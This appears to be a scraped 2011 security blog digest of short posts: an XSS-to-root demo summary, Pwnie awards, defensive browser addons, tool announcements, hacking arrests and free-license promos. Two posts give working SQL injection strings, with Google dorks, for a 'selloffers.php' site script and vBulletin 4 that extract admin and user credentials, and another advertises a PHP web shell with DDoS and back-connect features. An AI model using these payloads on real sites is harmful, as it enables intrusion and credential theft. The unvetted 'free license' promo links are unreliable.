This video will demonstrate how a simple XSS vulnerability can be leveraged to gain complete control of your web-browser and eventually lead to a complete system compromise.
1) We will use a cross-site scripting vulnerability as the initial attack vector
2) Exploit XSS by redirecting the user’s browser to the Evil_IP with a JavaScript loop (every 2 secs)
3) Exploit the victim’s browser to gain system ‘root’ or ‘shell’ access
4) Elevate our privileges to system-level
5) Dump the memory contents from an active SSH session and steal the SSH password from the victim’s computer

XSS Attack - Busting Browsers to Root! from Qjax on Vimeo.

This article is a video demonstration about Penetration Testing Execution Standard. David goes in-depth on the future of penetration testing through the Penetration Testing Execution Standard (PTES) and what it takes in order to elevate your security posture.

Video is all about technical talk which offers direction on where we need to head in the security industry. We know many of us like to create our own path. But known strategies will not harm.

Award categories
In 2011 there will be nine award categories:

Pwnie for Best Server-Side Bug
Pwnie for Best Client-Side Bug
Pwnie for Best Privilege Escalation Bug
Pwnie for Most Innovative Research
Pwnie for Lamest Vendor Response
Pwnie for Best Song
Pwnie for Most Epic FAIL
Pwnie for Lifetime Achievement
Pwnie for Epic Ownage

You Can Read All The Nominations here
http://pwnies.com/nominations/

VirtualBox is a general-purpose full virtualizer for x86 hardware, targeted at server, desktop and embedded use.

This version is a major update.

Download
http://www.virtualbox.org/wiki/Downloads

The X-FRAME-OPTIONS sets a restriction on the framing of a web page for a particular domain. It uses the value DENY and SAMEORIGIN for rendering the contents into a child frame.It is possible to stop the rendering completely in a child frame using DENY as a parameter. The SAMEORIGIN parameter declares that the content can only come
from the parent site and that no third party content rendering is allowed.This addon scans all the HTTP response headers that accompany with the web page and raises a notification in the status bar showing whether the declarative security for Clickjacking is applied on the respective domain or not.

Download - Firefox Addon
https://addons.mozilla.org/en-US/firefox/addon/clickjacking-defense-declar/

Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP is designed to be fully backward compatible; browsers that don't support it still work with servers that implement it, and vice-versa. Browsers that don't support CSP simply ignore it, functioning as usual, defaulting to the standard same-origin policy for web content.

Download - Firefox Addon
https://addons.mozilla.org/en-US/firefox/addon/http-content-security-polic/

Ani-Shell is a simple PHP shell with some unique features like Mass Mailer , A simple Web-Server Fuzzer , DDoser, Back Connect , Bind Shell etc etc ! This shell has immense capabilities and have been written with some coding standards in mind for better editing and customization.

Download
http://sourceforge.net/projects/ani-shell/

Default Login
Username : lionaneesh
Password : lionaneesh

Features

Antivirus, Anti-Spyware, Anti-Rootkit & Bot protection
Defends your PC from Internet attacks
Detects and eliminates viruses
Prevents malware from being installed
Auto Sandbox Technology™
Easy to install, configure and use
Free to both business and home users
60 Days of FREE GeekBuddy live remote PC support


Try Pro FREE for 1 year
Download
http://download.comodo.com/cis/download/installs/1000/partners/cispro_1year_installer_1221.exe

Web Browser Security Socially-Engineered Malware Protection Comparative Test Results. Surprising Results!

Browsers used

Apple Safari 5
Google Chrome 10
Windows Internet explorer 8
Windows Internet explorer 9
Mozilla Firefox 4
Opera 11

TABLE OF CONTENTS

Introduction………………………………………… 1
1.1 The Socially-Engineered Malware Threat ……………….1
1.2 Web Browser Security………………………………..1
Effectiveness Results …………………………………. 4
2.1 Test Composition: Malicious URLs …………………….4
2.2 Blocking URLs with Socially-Engineered Malware ………..4
2.3 Blocking URLs with Socially-Engineered Malware Over Time ….6
2.4 Safe Browsing Products ………………………….7
2.5 Microsoft’s IE9 and Application Reputation………..7
Conclusions…………………………………………. 9
Test Environment…………………………….. 11
4.1 Client Host Description ……………………11
4.2 The Tested Browsers……………………….12
4.3 Network Description ……………………12
4.4 About this Test…………………………..12
Appendix A: Test Procedures …………………….. 12
4.5 Test Duration …………………………..13
4.6 Sample Sets for Malware URLs………………13
4.7 Catalog URLs………………………………14
4.8 Confirm Sample Presence of URLs …………..14
4.9 Dynamically Execute Each URL ……………….14
4.10 Pruning…………………………………….15
4.11 Post-Test Validation……………………….15
Appendix B: Test Infrastructure …………………… 16

Download PDF
https://www.nsslabs.com/assets/noreg-reports/2011/nss%20labs_q2_2011_browsersem_FINAL.pdf

DumpIt provides an easy way of obtaining a memory image of a Windows system even if the investigator is not physically sitting in front of the target computer. It’s so easy to use, even a naive user can do it. It’s not appropriate for all scenarios, but it will definitely make memory acquisition easier in many situations.

To see DumpIt in action
http://www.youtube.com/watch?v=SEs4ZAolED0

Download
http://www.moonsols.com/wp-content/plugins/download-monitor/download.php?id=7

Source
http://pastebin.com/JBbbi394

by SecManiac

Source
http://pastebin.com/91J6dWZE

Here is the table of contents:
http://pastebin.com/EtHsJr4B

Download PDF:
http://tools.question-defense.com/Cracking_Passwords_Guide.pdf

Avast Internet Security 6 costs $49.99/year regularly but everyone can now grab a 100% genuine license.

Follow below steps to grab free Avast Internet Security 6.0

Click here
http://www.my-avast.de/AVAST-Aktion-com-so-gehts
to vist promo page
enter your firstname then lastname and email-id
you will recive a mail from avast team with license details

He faces up to 35 years in prison and $US1 million ($932 million) in fines for charges including wire fraud and computer fraud. He was released on a $US100,000 unsecured bond.

Source
http://www.stuff.co.nz/technology/digital-living/5313899/Harvard-fellow-charged-with-hacking

Dork : inurl:selloffers.php?cid= "Powered by indiacon.com"

Exploite:
www.victim.com/selloffers.php?cid=9/**/union/**/select/**/1,concat(sb_admin_name,0x3a,sb_pwd),3,4,5,6,7,8/**/from/**/auto_admin

by
Ehsan_Hp200

Source
http://www.npr.org/2011/07/20/138555799/fbi-arrests-alleged-anonymous-hackers
Statement
http://pastebin.com/RA15ix7S

By: anontangodown
Found in Pastebin

Google Dork: intitle: powered by Vbulletin 4

Vulnerable Code:
File: /vbforum/search/type/socialgroupmessage.php
Line No: 388
Paramater : messagegroupid
Source
http://pastebin.com/0L6tCjM3

Exploitation:
Post data on: -->search.php?search_type=1
--> Search Single Content Type
Keywords : Valid Group Message
Search Type : Group Messages
Search in Group : Valid Group Id

&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

by FB1H2S

Features of PCSuite Defrag PRO

Innovative 3-zone optimization provides your hard drive with maximum protection
New optimization methods
Clear representation of fragmentation level
No perceptible slowing down during the defragmentation process allows you to carry on working on your PC as normal
Flexible use (9 defragmentation methods, task scheduling, exception list)
Works on Windows 7, Vista and XP.

Follow below steps to grab free Registration key for PCSuite Defrag PRO.

Click here
"http://manager.markement.com/defrag_pcw.php?hs=30e4d9df0f760eee3a46dfe8f8538f80"
to visit promo page
Enter your details, e-mail-id, name, etc..
Now check your email you will receive an email from “info@markement.com” with your free license key. Due to high demand, the license request may take up to 24 hours to process.

Functions of WATOBO:

Supports session management.
Detects logout and automatically takes a re-login.
Supports filter functions
Inline-Encoder/Decoder
Includes vulnerability scanner
Quick-scan for targeted scanning a URL
Full-scan to scan a whole session
Manual request editor with special functions
Session information is updated
Login can be done automatically
Transcoder
URL, Base64, MD5, SHA-1
Interceptor
Fuzzer
Free, Stable and Open source!
Script code easy to understand
Easy to extend / adapt
In real-world scenarios tested and developed
Speed / usability
Active and Passive checks

Download
http://sourceforge.net/projects/watobo/files/

Video Tutorials:
http://sourceforge.net/apps/mediawiki/watobo/index.php?title=Videos

BackTrack 5
Source:Download and installation
http://pastebin.com/cnsM6dkS

WLAN Security Megaprimer DVD Released - 10+ hours of Wi-Fi Hacking and Pwnage !


Download
1. Mirror:
http://private.chaos-darmstadt.de/~alech/securitytube/WLAN-Security-Megaprimer-v1.iso
2. Mirror:
http://security.kokelnet.de/WLAN-Security-Megaprimer-v1.iso
3. Mirror:
http://mirror2.codsec.com/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso
http://mirror.codsec.com/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso